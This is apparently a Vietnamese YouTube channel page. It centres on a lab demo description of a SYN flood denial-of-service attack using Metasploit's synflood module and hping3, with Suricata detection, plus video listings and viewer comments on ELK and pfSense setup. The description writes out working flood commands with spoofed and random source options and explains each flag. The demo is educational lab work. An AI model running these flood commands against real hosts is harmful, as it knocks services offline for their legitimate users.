atuanlab
atuanlab
  • 60
  • 15 504
[DEMO] Hình thức tấn công từ chối dịch vụ (SYN Flood) | Metasploit và Hping3
DEMO - thực hiện tấn công "Từ chối dịch vụ" (DOS - Denail Of Service)
*1. TỔNG QUAN*
Tấn công từ chối dịch vụ (DoS - Denial of Service) là hình thức tấn công mạng nhằm làm quá tải hệ thống máy tính hoặc mạng, khiến chúng không thể đáp ứng được các yêu cầu hợp lệ của người dùng. Nói cách khác, kẻ tấn công sẽ cố tình làm cho một dịch vụ nào đó trở nên không khả dụng.
Trong bài DEMO thì mình dùng hình thức tấn công SYN Flood (thực hiện bằng Metasploit và Hping3). Trong quá trình thì mình dùng Suricata để phát hiện dấu hiện cuộc tấn công và dùng Wireshark trên máy Web Server để bắt gói tin. Theo mình thấy thì hình thức dùng Hping3 có thể khiến User không truy cập được Web nên nếu lấy làm demo thì hiệu quả hơn
*2. NỘI DUNG THỰC HIỆN*
Bài DEMO thực hiện các nội dung sau :
- Chuẩn bị mô hình : máy pfsense, máy web server (Windows Server 2016) và máy Kali
- Tấn công DOS bằng Metasploit (SYN Flood)
- Tấn công DOS bằng Hping3 (SYN Flood)
*3. QUẢNG CÁO*
CƠ SỞ RANG - XAY VÀ BUÔN BÁN CÀ PHÊ - TRÀ TÂN THÀNH
Đ/c: 252 Hòa Bình - Phường Hiệp Tân - Quận Tân Phú - TP HCM
SĐT: 0838 648 672 - 0907 844 345
*4. MÔ HÌNH THỰC HIỆN*
Bài DEMO thực hiện trên Vmware Workstation 17.5
- Máy pfsense 2.7.2 : WAN - 192.168.38.x/24 (DHCP) và LAN - 192.168.10.1/24
- Máy Web Server (Windows Server 2016) : 192.168.10.100/24
- Máy Kali : 192.168.38.x/24 (DHCP)
*5. QUÁ TRÌNH THỰC HIỆN*
5.1. Cài đặt máy Web Server (Windows Server 2016)
- IP tĩnh : 192.168.10.100/24
- Tải trang web minh họa : github.com/AhmadrezaMozaffary/Belfius-Banking
- Cài đặt dịch vụ IIS : Server Manager, chọn Server Roles là Web Serverr (IIS)
- Truy cập thư mục của trang mặc định và sao chép web minh họa vào : C:\inetpub\wwwroot\path\file
- Khởi động lại dịch vụ và truy cập từ máy nội bộ hoặc máy Client khác cùng mạng
- Cài đặt WIRESHARK : www.wireshark.org/download.html
5.2. Cấu hình máy pfsense 2.7.2
- Cài đặt SURICATA : System, chọn Package Manager, tìm kiếm và chọn Suricata
- Tại Interface thì tạo Add và chọn WAN, tắt các Offloading và khởi động lại pfsense (tự động)
- Tại Global Settings thì chọn các Ruleset mình thích (ví dụ như ETOpen)
- Tại UPDATE thì chọn Update để cập nhập các Rule từ các Ruleset
- Trở lại INTERFACE và chọn WAN, chọn WAN CATEGORY và chọn Select All
- Khởi động lại WAN (kiểm tra trong /var/log/suricata)
- PORT FORWARD (mở Port) : Chọn Firewall, chọn NAT, tại Port Forward thì chọn ADD
- Cấu hình PORT FORWARD : Protocol - chọn TCP/UDP, Source - mặc định, Destination - chọn 8080, Redirect tar IP - 192.168.38.100, Redirect tar Port - chọn HTTP
- Truy cập : IP-WAN:8080
5.3. Tấn công DOS bằng METASPLOIT
- Truy cập : sudo msfconsole
- Dùng "synflood" module : use auxiliary/dos/tcp/synflood
- Thiết lập RHOSTS, RPORT, SHOST : set RHOSTS 192.168.38.172, set RPORT 8080, set SHOST 192.168.38.200
- Thực hiện tấn công : exploit
5.4. Tấn công DOS bằng HPING3
- Tải (nếu chưa có) : sudo apt install hping3
- Lệnh đơn giản : sudo hping3 -S --flood -V -p 8080 192.168.38.172
- Lệnh phức tạp hơn : sudo hping3 -c 15000 -d 120 -S -w 64 -p 8080 --flood --rand-source 192.168.38.172
Giải thích
-c 15000 : gửi 15000 packet
-d 120 : 1 packet có size là 120 bytes
-S : sử dụng cờ (flag) là SYN
-w 64 : TCP Windows size là 64
-p 8080 : tấn công vào port 8080
-flood : gửi packet nhanh
-rand-source : source ngẫu nhiên
Lệnh này thì có thể khiến Client không ping được và cũng không truy cập trang web được
*6. TÀI LIỆU THAM KHẢO*
- www.fortinet.com/resources/cyberglossary/dos-vs-ddos
- anonyviet.com/cach-thuc-hien-mot-cuoc-tan-cong-dos-don-gian-voi-metasploit-va-hping3/
- linuxhint.com/hping3/
*7. CÁC MỐC THỜI GIAN SỰ KIỆN*
00:00 Tiêu đề
00:20 Mô hình thực hiện
00:40 1. NỘI DUNG THỰC HIỆN
01:02 2. THIẾT LẬP MÁY WEB SERVER
02:00 Thiết lập chung
03:45 Tải trang web minh họa
04:57 Cấu hình dịch vụ IIS (Web Server)
08:36 Cài đặt WIRESHARK
12:07 3. THIẾT LẬP TRÊN PFSENSE (2.7.2)
12:21 Thiết lập chung
13:35 Cài đặt SURICATA
23:33 Cấu hình mở port (PORT FORWARD)
25:58 4. TẤN CÔNG BẰNG METASPLOIT
29:04 5. TẤN CÔNG BẰNG HPING3
29:13 Dùng lệnh cơ bản
30:34 Dùng thiết lập khác (có thể chặn được truy cập)
----------------------------------------------------
THÔNG TIN LIÊN LẠC
▶ Email : ng.atuanlab.yt@gmail.com
▶ Facebook: atuanlab
▶ Môn Học (File PDF): tinyurl.com/bd8td3fn
▶ Phần Mềm: tinyurl.com/583anxxu
CẢM ƠN CÁC BẠN ĐÃ XEM VIDEO CỦA MÌNH !!! (^.^)
-----------------------------------------------------
© Bản quyền thuộc về ATLab Official
© Copyright by ATLab Official - DO NOT REUP
มุมมอง: 173

วีดีโอ

[DEMO] Configure Postfix (3.6.4) as a Relay Server and use Gmail SMTP to send Email
มุมมอง 2414 ชั่วโมงที่ผ่านมา
Thực hiện cấu hình Postfix (3.6.4) như một Server Relay và dùng Gmail SMTP để gửi Email #linux #postfix #emailsend #homelab #networkservice *1. TỔNG QUAN* Postfix là một MTA (Mail Transport Agent), hay còn gọi là agent chuyển tiếp thư được sử dụng rộng rãi trong các hệ thống Linux và Unix. Nó đóng vai trò như một server thư giúp chuyển tiếp, gửi và nhận email một cách hiệu quả. Trong một vài ch...
[IPS-IDS] Cài đặt và cấu hình EveBox (0.18.2) để giao diện hóa giám sát cảnh báo cho Suricata
มุมมอง 5419 ชั่วโมงที่ผ่านมา
Thực hiện cài đặt EveBox (0.18.2) trên Ubuntu 22.04 để giao diện hóa giám sát cảnh báo với Suricata (7.0.6) *1. THÔNG TIN CHUNG* Evebox là một nền tảng mã nguồn mở, được thiết kế để cung cấp một giao diện trực quan và dễ sử dụng cho các hệ thống IDS/IPS, đặc biệt là Suricata. Trong bài DEMO thì mình sẽ thực hiện cài đặt EveBox trên máy Suricata để hiển thị trực quan giao diện các log cảnh báo c...
[DEMO] Install LogAlert to monitor log files and send alerts to Email (Google SMTP)
มุมมอง 28วันที่ผ่านมา
Thực hiện cài đặt và cấu hình Logalert để giám sát log (auth.log) và gửi Email cảnh báo (Google SMTP) *1. THÔNG TIN CHUNG* LogAlert là một phần mềm giám sát các file log (hay là một tập tin nhất định) bằng cách tìm các nội dung trùng khớp theo thiết lập. Nếu như nội dung hiển thị trong các log trùn khớp với đối tượng cần giám sát thì chương trình sẽ hiển thị cảnh báo (trong log riêng) và gủi Em...
[DEMO] Config SSMTP on Ubuntu 22.04 | GMAIL SMTP
มุมมอง 2714 วันที่ผ่านมา
Thực hiện cấu hình dịch vụ SSMTP trên Ubuntu Server 22.04 và dùng Gmail SMTP để gửi email *1. THÔNG TIN CHUNG* SSMTP (Secure Simple Mail Transfer Protocol) là một công cụ hữu ích và đơn giản, được sử dụng rộng rãi trên hệ điều hành Linux để gửi email. SSMTP có những ứng dụng thực tế như : gửi thông báo, tự động hóa và phát triển ứng dụng *2. NỘI DUNG THỰC HIỆN* Video demo thực hiện những nội du...
[GSUC] Cài đặt và cấu hình Wazuh (4.8.2) trên Ubuntu 22.04
มุมมอง 9514 วันที่ผ่านมา
Thực hiện cấu hình WAZHU (4.8.2) trên UBUNTU 22.04 và cấu hình AGENT (Linux, Wins và Pfsense) *1. THÔNG TIN CHUNG* Wazuh là một giải pháp bảo mật toàn diện, kết hợp các khả năng của XDR (Extended Detection and Response) và SIEM (Security Information and Event Management). Các thành phần chính của Wazuh - Wazuh agent: phần mềm cài đặt và thu thập thông tin trên client - Wazuh server: máy chủ thu...
[CNTL] Cấu hình DHCP RELAY trên pfsense 2.7.2
มุมมอง 7321 วันที่ผ่านมา
*TIÊU ĐỀ : CẤU HÌNH DHPC RELAY TRÊN TƯỜNG LỬA PFSENSE 2.7.2* *1. THÔNG TIN CHUNG* DHCP Relay (hay còn gọi là DHCP Agent) là một thiết bị mạng (thường là một router hoặc một máy tính được cấu hình đặc biệt) đóng vai trò trung gian giữa các máy khách DHCP (DHCP clients) và máy chủ DHCP (DHCP server). DHCP Relay có nhiệm vụ chuyển tiếp các gói tin DHCP giữa các mạng con khác nhau, giúp cho các máy...
[DEMO] How to setup DHCP SERVER on Ubuntu Server 22.04 (use isc-dhcp-server)
มุมมอง 4821 วันที่ผ่านมา
*TITLE : HOW TO SETUP DHCP SERVER ON UBUNTU SERVER 22.04 (USE ISC-DHCP-SERVER)* *1. OVERVIEW* Dynamic Host Configuration Protocol (DHCP) is a network management protocol used to automatically assign IP addresses and other network configuration information to devices on a network. DHCP has 4 stages : DHCP Discovery, DHCP Offer, DHCP Request, DHCP Acknowledgment - DHCP Discovery : A device joins ...
[CNTL] Cấu hình mở port trên pfsense 2.7.2 (Port Forwards)
มุมมอง 6828 วันที่ผ่านมา
*TIÊU ĐỀ : THIẾT LẬP MỞ PORT TRÊN PFSENSE 2.7.2 (PORT FORWARDS)* *1. GIỚI THIỆU CHUNG* Port forwarding là một kỹ thuật mạng cho phép bạn chuyển hướng các kết nối đến một cổng cụ thể trên máy chủ của bạn đến một dịch vụ hoặc ứng dụng đang chạy trên một máy khác trong mạng nội bộ. Nói cách khác, nó tạo ra một "đường hầm" cho phép các thiết bị bên ngoài mạng của bạn truy cập vào các dịch vụ đang c...
[QTM] Thiết lập site-to-site VPN dùng giao thức PPTP (trên Windows Server 2016)
มุมมอง 6128 วันที่ผ่านมา
*TIÊU ĐỀ: THIẾT LẬP SITE-TO-SITE VPN TRÊN WINDOWS SERVER 2016 (DÙNG PPTP)* *1. GIỚI THIỆU CHUNG* PPTP (Point-to-Point Tunneling Protocol) là một giao thức đường hầm được sử dụng để tạo ra các mạng riêng ảo (VPN). Nó cho phép các thiết bị kết nối với mạng riêng tư thông qua một mạng công cộng không an toàn như Internet. PPTP đóng vai trò như một "đường hầm" bảo mật, mã hóa dữ liệu trước khi truy...
[GSUC] Giám sát mạng với Nagios XI (2024R1.1.5)
มุมมอง 85หลายเดือนก่อน
*TIÊU ĐỀ: GIÁM SÁT VỚI NAGIOS XI (2024R1.1.5)* *1. GIỚI THIỆU CHUNG* Nagios XI là một giải pháp giám sát cơ sở hạ tầng IT mạnh mẽ và toàn diện. Nó được xây dựng trên nền tảng Nagios Core, một công cụ mã nguồn mở nổi tiếng trong lĩnh vực giám sát hệ thống. Nagios XI cung cấp một giao diện người dùng trực quan, dễ sử dụng và nhiều tính năng nâng cao so với phiên bản Core, giúp cho việc theo dõi v...
[CNTL] LAB 02 | Cấu hình giới hạn truy cập trên Palo Alto 8 (Application, blocking URL, File và DOS)
มุมมอง 325หลายเดือนก่อน
*TIÊU ĐỀ : [CNTL] LAB 02 - CẤU HÌNH GIỚI HẠN TRUY CẬP TRÊN PALO ALTO 8 (applicaltion, blocking url, dos và blocking file)* *1. GIỚI THIỆU CHUNG* Đây là video Demo cho bài "LAB 02" của môn "Công Nghệ Tường Lửa". Nội dung sẽ tập trung vào việc thiết lập các giới hạn truy cập cho các đối tượng như Ứng dụng (application), URL, kiểu tập tin và cũng như chống lại DOS (ICMP Echo Flood). Một vài phần n...
[CNTL] LAB 03 | Cấu hình nâng cao trên Palo Alto 8 (Captive Portal và VPN)
มุมมอง 217หลายเดือนก่อน
*TIÊU ĐỀ : [CNTL] LAB 03 - CẤU HÌNH MẠNG NÂNG CAO (CAPTIVE PORTAL VÀ VPN)* *1. GIỚI THIỆU CHUNG* Đây là bài demo mình thực hiện cho "LAB 03" của môn "Công Nghệ Tường Lửa". Nội dung thì tập trung vào các thiết lập mạng nâng cao như : Captive Portal và VPN (Remote Access VPN và Site-to-Site VPN) *2. NỘI DUNG THỰC HIỆN* Nội dung thực hiện bài "LAB 03" bao gồm : - Cấu hình Captive Portal - Cấu hình...
[CNTL] LAB 01 - Cấu hình Palo Alto 8.0.0 trên GNS 3
มุมมอง 311หลายเดือนก่อน
*TIÊU ĐỀ: LAB 01 - CẤU HÌNH CƠ BẢN PALO ALTO 8 TRÊN GNS3* *1. GIỚI THIỆU CHUNG* Đây là demo mình thực hiện cho bài Lab 01 của môn "Công nghệ tường lửa". Nội dung thì tập trung vào những cấu hình cơ bản của Palo Alto (bản 8.0.0) trên GNS3. Mình thấy thì tường lửa Palo Alto sẽ phức tạp và nhiều tính năng hơn nếu như so sánh với Pfsense. Ví dụ như phần thiết lập SNAT và DNAT, về cơ bản thì SNAT nế...
[CNTL] Cài đặt tường lửa Palo Alto 8.0.0 trên GNS3 2.2.48
มุมมอง 358หลายเดือนก่อน
*TIÊU ĐỀ: CÀI ĐẶT TƯỜNG LỬA PALO ALTO 8.0.0 TRÊN GNS3* *1. GIỚI THIỆU CHUNG* Đây là bài demo cho bài lab thực hành môn "Công nghệ tường lửa" và nội dung bài này thì chỉ tập trung vào việc mình sẽ cài đặt thiết bị ảo tường lửa Palo Alto (dùng .qcow2) trên GNS3 để thực hiện các yêu cầu trong tài liệu. Trong quá trình mình sử dụng thì mình thấy GNS3 cũng tiện lợi nhưng mình chỉ dùng GNS3 lúc còn h...
[GSUC] Giám sát log của suricata trên pfsense bằng Zabbix 7.0
มุมมอง 1072 หลายเดือนก่อน
[GSUC] Giám sát log của suricata trên pfsense bằng Zabbix 7.0
[GSUC] Cài đặt giám sát log trên Zabbix (7.0)
มุมมอง 2572 หลายเดือนก่อน
[GSUC] Cài đặt giám sát log trên Zabbix (7.0)
[GSUC] Cài đặt ELK Stack (Elasticseach 7.x) và giám sát Log với Filebeat, Winlogbeat
มุมมอง 1602 หลายเดือนก่อน
[GSUC] Cài đặt ELK Stack (Elasticseach 7.x) và giám sát Log với Filebeat, Winlogbeat
Cài đặt bộ gõ tiếng việt (ibus-bamboo) trên Debian (12 và 11)
มุมมอง 1682 หลายเดือนก่อน
Cài đặt bộ gõ tiếng việt (ibus-bamboo) trên Debian (12 và 11)
[QTM] Cài đặt Server thành Domain Controller trên Windows Server (20089 R2 và 2016)
มุมมอง 352 หลายเดือนก่อน
[QTM] Cài đặt Server thành Domain Controller trên Windows Server (20089 R2 và 2016)
Cài đặt bộ gõ tiếng việt (ibus-bamboo) trên Linux Mint (21.3) [CC]
มุมมอง 1462 หลายเดือนก่อน
Cài đặt bộ gõ tiếng việt (ibus-bamboo) trên Linux Mint (21.3) [CC]
[IDS/IPS] Cài đặt Suricata trên Pfsense 2.7.2
มุมมอง 7483 หลายเดือนก่อน
[IDS/IPS] Cài đặt Suricata trên Pfsense 2.7.2
[AH-DTDM] TH03 - Cài đặt mạng LAN giữa VMWARE (17.5) và VIRTUALBOX (7.0.18)
มุมมอง 493 หลายเดือนก่อน
[AH-DTDM] TH03 - Cài đặt mạng LAN giữa VMWARE (17.5) và VIRTUALBOX (7.0.18)
[AH-DTDM] Cài đặt Proxmox VE 8.2 trên VMWare Workstation 17.5
มุมมอง 2953 หลายเดือนก่อน
[AH-DTDM] Cài đặt Proxmox VE 8.2 trên VMWare Workstation 17.5
[QTM] Cài đặt VPN Server (dùng SSTP) trên Windows Server 2016
มุมมอง 803 หลายเดือนก่อน
[QTM] Cài đặt VPN Server (dùng SSTP) trên Windows Server 2016
[PTLH-KT] Khai thác lỗ hổng CVE-2003-0201 (trên Samba 2.2.0 đến 2.2.8) [CC]
มุมมอง 683 หลายเดือนก่อน
[PTLH-KT] Khai thác lỗ hổng CVE-2003-0201 (trên Samba 2.2.0 đến 2.2.8) [CC]
[DEMO] Ẩn danh với TOR (proxy) và PROXYCHAINS [CC]
มุมมอง 954 หลายเดือนก่อน
[DEMO] Ẩn danh với TOR (proxy) và PROXYCHAINS [CC]
[AH-DTDM] Deploy và Hosting website tĩnh bằng Netlify (và Hugo) [CC]
มุมมอง 664 หลายเดือนก่อน
[AH-DTDM] Deploy và Hosting website tĩnh bằng Netlify (và Hugo) [CC]
[2024] CÙNG MÌNH CHƠI THỬ CTF VỚI PICOCTF 2024 [General SKill - P2]
มุมมอง 534 หลายเดือนก่อน
[2024] CÙNG MÌNH CHƠI THỬ CTF VỚI PICOCTF 2024 [General SKill - P2]
[AH-DTDM] Cài đặt MKDOCS (1.6.0) trên Docker (trên Ubuntu Desktop 22.04.4) [CC]
มุมมอง 804 หลายเดือนก่อน
[AH-DTDM] Cài đặt MKDOCS (1.6.0) trên Docker (trên Ubuntu Desktop 22.04.4) [CC]

ความคิดเห็น

  • @thaophuong5596
    @thaophuong5596 10 วันที่ผ่านมา

    Theo em hiểu mô hình là anh dựng snort IDS trên ubuntu, từ ubuntu đẩy log cho pfsense (snort IPS) để action drop/block packet à hay anh dựng pfsense (cài snort đảm nhiệm IDS/IPS) luôn vậy.

    • @atuanlab
      @atuanlab 10 วันที่ผ่านมา

      Cảm ơn bạn đã xem video của mình !!! Theo như video demo thì mình cài snort lên pfsense để trực tiếp đảm nhiệm tính năng của IDS/IPS, còn mô hình thì lúc thực hiện nội dung bài này, mình không có dùng đến máy Snort thứ 2 (trong mạng LAN) nên thành ra trên mô hình chỉ minh hoạ thôi.

  • @a5vlogs605
    @a5vlogs605 17 วันที่ผ่านมา

    hay anh ơi

  • @tranthanhnguyen9467
    @tranthanhnguyen9467 หลายเดือนก่อน

    video hay quá cảm ơn ad nhìu <33

  • @sonkhcnnguyenhoang
    @sonkhcnnguyenhoang หลายเดือนก่อน

    Mình thực hiện đến bước cài đặt xong file beat thì check lại elastichsearch bị fail nên mở dashboard bị lỗi thì phải làm sao ạ? mặc dù mình đã extend thêm dung lượng, nhờ anh hỗ trợ giúp ạ

    • @atuanlab
      @atuanlab หลายเดือนก่อน

      Cảm ơn bạn đã xem video của mình !!! Vấn đề này mình cũng mới gặp, lúc Elasticsearch bị lỗi thì có hiển thị mã lỗi hay gì khác không ? Bạn thử kiểm tra file log của Elasticsearch xem có hiển thị gì không ? (/var/log/elasticsearch )

    • @kenhcuason4188
      @kenhcuason4188 หลายเดือนก่อน

      @@atuanlabdo RAM bị đầy nên mình đã chỉnh lại được. Cho mình hỏi thêm 1 ý nữa là: bạn có biết cấu hình để lấy log từ OSSEC Agent và Log Snort về ELK ko ạ. Mong bạn giải đáp giúp cảm ơn bạn nhiều ạ

  • @dubx2
    @dubx2 หลายเดือนก่อน

    Cho mình hỏi khi ping máy chủ nó báo Request timed out thì fix như nào ạ

    • @atuanlab
      @atuanlab หลายเดือนก่อน

      Cảm ơn bạn đã xem video của mình !!! Lỗi "Request Time Out" thì đơn giản là gói tin đến được máy chủ rồi ấy nhưng mà không nhận được gói phản hồi (Echo Reply Messages) Bạn thử kiểm tra lại xem tường lửa trên máy chủ đã tắt chưa (nếu mình hiểu máy chủ ở đây trong video demo là Windows Server thì phải tắt tường lửa hoặc thêm Rule thì mới Ping được)

    • @dubx2
      @dubx2 หลายเดือนก่อน

      @@atuanlab Mình cài trên máy phụ ấy nhưng khi dùng chính để kết nối thì không đc, dùng chung mạng ấy

    • @atuanlab
      @atuanlab หลายเดือนก่อน

      @@dubx2 Bạn có thể mô tả đơn giản cái mô hình cho mình hình dung được ko ?

    • @dubx2
      @dubx2 หลายเดือนก่อน

      @@atuanlab Máy phụ( Proxmox) đến Modem nhà mạng , Máy chính đến Modem nhà mạng. Mình chỉ dùng 1 Modem duy nhất Không biết mô hình như này có đúng không nữa

    • @atuanlab
      @atuanlab หลายเดือนก่อน

      @@dubx2 Mô hình như vậy là chuẩn rồi ấy bạn. Ban đầu bạn bảo là máy chính không kết nối được với máy phụ thì ý của bạn là máy thật không ping được máy Proxmox ấy hả hay là máy thật không ping được máy ảo do Proxmox tạo ra vậy ?

  • @user-nx3vo2mj5m
    @user-nx3vo2mj5m หลายเดือนก่อน

    Cám ơn bác, nội dung chia sẻ qua các video rất hữu ích. Với các video bác nên thiết kế hình ảnh đại diện kiểu thumbnail để nhìn bố cục trang của bác trông nó xinh hơn

  • @Hieno-bt8eg
    @Hieno-bt8eg 2 หลายเดือนก่อน

    Anh làm thêm phần giám sát và gửi cảnh báo qua mail đi ạ

  • @minhtuannguyen6086
    @minhtuannguyen6086 2 หลายเดือนก่อน

    Ứng dụng nền màu đen a sử dụng là ứng dụng gì vậy ạ

    • @atuanlab
      @atuanlab 2 หลายเดือนก่อน

      Cảm ơn bạn đã xem video của mình !!! Ứng dụng đó là Putty, là một ứng dụng kết nối từ xa bằng cửa sổ lệnh hỗ trợ nhiều giao thức. Mình có dùng thêm theme ở bên ngoài cho nó có màu như vậy (theme mình dùng trong link là : 50 - Zenburn) - Putty : www.putty.org/ - Theme : github.com/AlexAkulov/putty-color-themes

  • @atuanlab
    @atuanlab 2 หลายเดือนก่อน

    *1. QUÁ TRÌNH THỰC HIỆN* 1.1. Cài đặt và thiết lập Elasticsearch (bản 7.x) - Thêm khóa PGP của elasticsearch : curl -fsSL artifacts.elastic.co/GPG-KEY-elasticsearch |sudo gpg --dearmor -o /usr/share/keyrings/elastic.gpg - Thêm Repo vào "sources.list.d" : echo "deb [signed-by=/usr/share/keyrings/elastic.gpg] artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list - Cập nhập lại APT : sudo apt update - Cài đặt Elasticsearch bằng APT : sudo apt install elasticsearch - Tùy chỉnh file cấu hình : /etc/elasticsearch/elasticsearch.yml (thêm network.host: 0.0.0.0 và discovery.type: single-node) - Khởi động lại dịch vụ : sudo systemctl restart elasticsearch - Bật dịch vụ lúc khởi động : sudo systemctl enable elasticsearch - Kiểm tra tình trạng hoạt động : sudo systemctl status elasticsearch - Dùng HTTP Request để kiểm tra dữ liệu : curl -X GET "localhost:9200" (hay curl -X GET "192.168.38.100:9200") 1.2. Cài đặt và thiết lập Kibana - Cài đặt bằng APT : sudo apt install kibana - Tùy chỉnh file config : /etc/kibana/kibana.yml (thêm server.host: 0.0.0.0) - Khởi động lại dịch vụ Kibana : sudo systemctl restart kibana - Bật dịch vụ tự khởi động : sudo systemctl enable kibana - Kiểm tra tình trạng hoạt động : sudo systemctl status kibana - Truy cập Dashboard : IP:5601 1.3. Cài đặt và thiết lập logstash - Cài đặt logstash bằng APT: sudo apt install logstash - Tạo file "/etc/logstash/conf.d/02-beats-input.conf" lấy input của beat (tham khảo www.digitalocean.com/) - Tạo file "/etc/logstash/conf.d/30-elasticsearch-output.conf" là output của elasticsearch (tham khảo www.digitalocean.com/) - Kiểm tra và thiết lập logstash : sudo -u logstash /usr/share/logstash/bin/logstash --path.settings /etc/logstash -t - Khởi động lại dịch vụ : sudo systemctl restart logstash - Bật dịch vụ tự khởi động : sudo systemctl enable logstash - Kiểm tra tình trạng hoạt động : sudo systemctl status logstash 1.4. Cài đặt và thiết lập filebeat trên elk-server - Cài đặt từ APT : sudo apt install filebeat - Tùy chỉnh file config : /etc/filebeat/filebeat.yml (tắt output cho elasticsearch và bật của logstash) - Sử dụng module là "system" : sudo filebeat modules enable system - Xuất danh sách các module hỗ trợ : sudo filebeat setup --pipelines --modules system - Cài đặt filebeat lấy dữ liệu từ system : sudo filebeat setup --pipelines --modules system - Cài đặt template cho elasticsearch : sudo filebeat setup --index-management -E output.logstash.enabled=false -E 'output.elasticsearch.hosts=["localhost:9200"]' - Cài đặt lấy dữ liệu cho Kibana : sudo filebeat setup -E output.logstash.enabled=false -E output.elasticsearch.hosts=['localhost:9200'] -E setup.kibana.host=localhost:5601 - Khởi động lại dịch vụ : sudo systemctl restart filebeat - Bật dịch vụ tự khởi động : sudo systemctl enable filebeat - Kiểm tra tình trạng hoạt động : sudo systemctl status filebeat - Truy cập Dashboard : xem log trong Discover và chọn Dashboard mẫu trong Dashboard 1.5. Cài đặt và thiết lập filebeat trên linux-client - Cần thêm khóa PGP và Repo của Elasticsearch (tham khảo bước cài elasticsearch) - Cài đặt từ APT : sudo apt install filebeat - Tùy chỉnh file config : /etc/filebeat/filebeat.yml (tắt output cho elasticsearch và bật của logstash) + hosts: ["192.168.38.100:5044"] (nhập IP của máy ELK Server thay vì là localhost) - Sử dụng module là "system" : sudo filebeat modules enable system - Xuất danh sách các module hỗ trợ : sudo filebeat setup --pipelines --modules system - Cài đặt filebeat lấy dữ liệu từ system : sudo filebeat setup --pipelines --modules system - Cài đặt template cho elasticsearch : sudo filebeat setup --index-management -E output.logstash.enabled=false -E 'output.elasticsearch.hosts=["192.168.38.100:9200"]' - Cài đặt lấy dữ liệu cho Kibana : sudo filebeat setup -E output.logstash.enabled=false -E output.elasticsearch.hosts=['192.168.38.100:9200'] -E setup.kibana.host=192.168.38.100:5601 - Khởi động lại dịch vụ : sudo systemctl restart filebeat - Bật dịch vụ tự khởi động : sudo systemctl enable filebeat - Kiểm tra tình trạng hoạt động : sudo systemctl status filebeat - Truy cập Dashboard : xem log trong Discover và chọn Dashboard mẫu trong Dashboard 1.6. Cài đặt và thiết lập winlogbeat trên wins-client - Tải file từ trang chủ : www.elastic.co/downloads/beats/winlogbeat - Giải nén, đổi tên thành "Winlogbeat" và di chuyển vào "C:\Program Files" - Bật Powershell với quyền Admin + di chuyển vào thư mục Winlogbeat : cd 'C:\Program Files\Winlogbeat' + cài đặt bằng script : .\install-service-winlogbeat.ps1 (hay PowerShell.exe -ExecutionPolicy UnRestricted -File .\install-service-winlogbeat.ps1) + tùy chỉnh file cấu hình winlogbeat.yml (thêm host: "192.168.38.100:5601" ở setup.kibana và hosts: ["192.168.38.100:9200"] ở output.kibana) + cài đặt các thành phần : .\winlogbeat.exe setup -e + bật dịch vụ Start-Service winlogbeat - Truy cập Dashboard của Kibana : vào Discovery để xem log (chọn winlogbeat-*) hay chọn mẫu dashboard có sẵn

  • @TenTen-lf1dl
    @TenTen-lf1dl 2 หลายเดือนก่อน

    anh có thể giải thích giúp em vì sao khi cài pfsense cần phân vùng ổ đĩa không ạ, và khi cài đặt được pfsense trên máy client cần cấu hình DNS Resolver và DNS Forwarder để làm gì ạ, e cảm ơn

    • @atuanlab
      @atuanlab 2 หลายเดือนก่อน

      Cảm ơn bạn đã xem video của mình !!! - Phân vùng ổ cứng : cơ bản thì cậu cài cái gì thì cũng đều phải phân vùng ổ cứng. Việc phân vùng ổ cứng nhằm : phân chia dung lượng và chọn định dạng file hệ thống. Trong pfsense hỗ trợ cả dạng ZFS và UFS. Mình thì không dùng ZFS nên không chọn phân vùng bằng ZFS. Mình chọn Manual để phân vùng tùy ý nhưng cũng dùng hết cả ổ cứng ảo nên dù chọn giữa "Auto (UFS)" hay "Manual" đều được. - Dùng DNS Resolver và DNS Forwarder : hiểu đơn giản là DNS Forwarder sẽ chuyển các yêu cầu đến một DNS Resolver để phân giải tên miền. Còn DNS Resolver sẽ chứa các bản ghi (record) trong một CSDL nội bộ để thực hiện phân giải. Trong môi trường lab của mình thì mình không cần đến DNS Resolver, mình thiết lập DNS của Client trỏ về pfsense, tức là nếu client gửi yêu cầu phân giải tên miền đến pfsense, pfsense sẽ chuyển chúng dến với 8.8.8.8 (mình dùng của google) theo cách thức của DNS Forwarder. Còn một cái nữa là trong lúc mình làm thì tùy chọn DNS Resolver mặc định (mới cài) sẽ không cho mình truy cập được Internet nên mình chuyển qua DNS Forwarder. Còn nếu bạn muốn dùng DNS Resolver luôn thì trong phần "DNS Query Forwarding", bạn chọn "Forwarding mode" để pfsense chuyển yêu cầu đến một DNS Server đã thiết lập trong "General Setup". Nói một cách khác là tính năng DNS Resolver dùng cho một môi trường phức tạp hơn nếu bạn muốn kiểm soát các yêu cầu phân giải của DNS. Còn trong phạm vi bài demo của mình thì đơn giản hơn và không yêu cầu nhiều nên mình dùng DNS Forwarder.

  • @O...Maiden...O
    @O...Maiden...O 2 หลายเดือนก่อน

    đố b cài được ibus-bamboo trên debian 11.10 đó 🙂

    • @nguyenuchanh8701
      @nguyenuchanh8701 2 หลายเดือนก่อน

      Debian 10 or Debian 11 in software.opensuse.org//download.html?project=home%3Alamlng&package=ibus-bamboo#manualDebian

    • @O...Maiden...O
      @O...Maiden...O 2 หลายเดือนก่อน

      @@nguyenuchanh8701 m đang đố b cài mà, chứ ko cần link cài đặt, b tự cài thử xem 🙂

  • @duyanhphamvu3781
    @duyanhphamvu3781 3 หลายเดือนก่อน

    may minh co moi vmnet01 la host only thi chon vmnet01 ha b

    • @atuanlab
      @atuanlab 3 หลายเดือนก่อน

      Cảm ơn bạn đã xem video của mình ! Thường thì vmnet1 là mặc định (host-only) khi cài VMware Workstation nên nếu bạn muốn dùng luôn cũng được (thường lúc lười hay mới cài thì mình cũng xài vmnet1 à, cho nó tiện ấy (^.^) ). Nhưng nếu bạn muốn thêm những Adapter khác (ngoài mặc định) thì bạn có thể vào : Edit > Virtual Network Editor > Change Settings > Thêm hay tùy chỉnh Network. Nếu về đề tài Network trên VMware luôn thì bạn có thể tham khảo - th-cam.com/video/yUTJ0cSvNfs/w-d-xo.html (video của anh Kai Nguyen cũng khá chi tiết ấy).

    • @duyanhphamvu3781
      @duyanhphamvu3781 3 หลายเดือนก่อน

      @@atuanlab Cảm ơn b mình ko chuyên về mạng mà đang học môn mã nguồn mở nên phải nghiên cứu pfsense.

  • @phuchoang7202
    @phuchoang7202 3 หลายเดือนก่อน

    sao tôi cấu hình Ip tĩnh cho server2016 xong thì không còn mạng nữa, mong bạn giải thích

    • @atuanlab
